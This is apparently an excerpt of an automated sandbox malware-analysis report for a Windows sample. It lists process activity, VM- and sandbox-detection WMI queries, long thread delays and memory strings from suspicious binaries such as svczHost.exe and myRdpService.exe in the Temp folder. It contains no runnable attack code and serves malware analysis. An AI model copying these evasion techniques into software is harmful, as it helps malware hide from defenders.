Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE			Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID='Disk #0, Partition #2'} WHERE ResultClass=Win32_DiskDrive
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType=3
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='C:'} WHERE ResultClass = Win32_DiskPartition
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DeviceBus where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_SCSIControllerDevice where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PnPDevice where SameElement="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_SystemDevices where PartComponent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_USBControllerDevice where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CIMLogicalDeviceCIMDataFile where Antecedent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_IDEControllerDevice where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_AllocatedResource where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_1394ControllerDevice where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::GetObject - root\cimv2 : Win32_LogicalDisk

Source: C:\Windows\Temp\svczHost.exe	Memory allocated: 24F77F00000 memory reserve \| memory write watch
Source: C:\Windows\Temp\myRdpService.exe	Memory allocated: 1C9E5030000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9917	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9900	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9922	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9906

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 9900 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4848	Thread sleep count: 9922 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140	Thread sleep count: 9930 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1724	Thread sleep count: 9896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 428	Thread sleep count: 9915 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep count: 9906 > 30

Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\Temp\myRdpService.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\net1.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000			Jump to behavior

Source: powershell.exe, 00000009.00000002.25579447152.000001FA1D9E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7B400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: /Rv`qHgFsd`udsVhuiW`mtdr
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7B400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Rv`qHgFsd`uds
Source: powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000005.00000002.24431081680.000001C3F8060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5@
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1D9E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: powershell.exe, 00000018.00000002.24773503359.00000281EB15F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0411%SystemRoot%\system32\mswsock.dllrosoft Corporation1)0'
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1D9E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7B400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UisnvMdrrDpt`m%UisnvHgFsd`udsUi`o!Sdqm`bdW`mtdUxqd
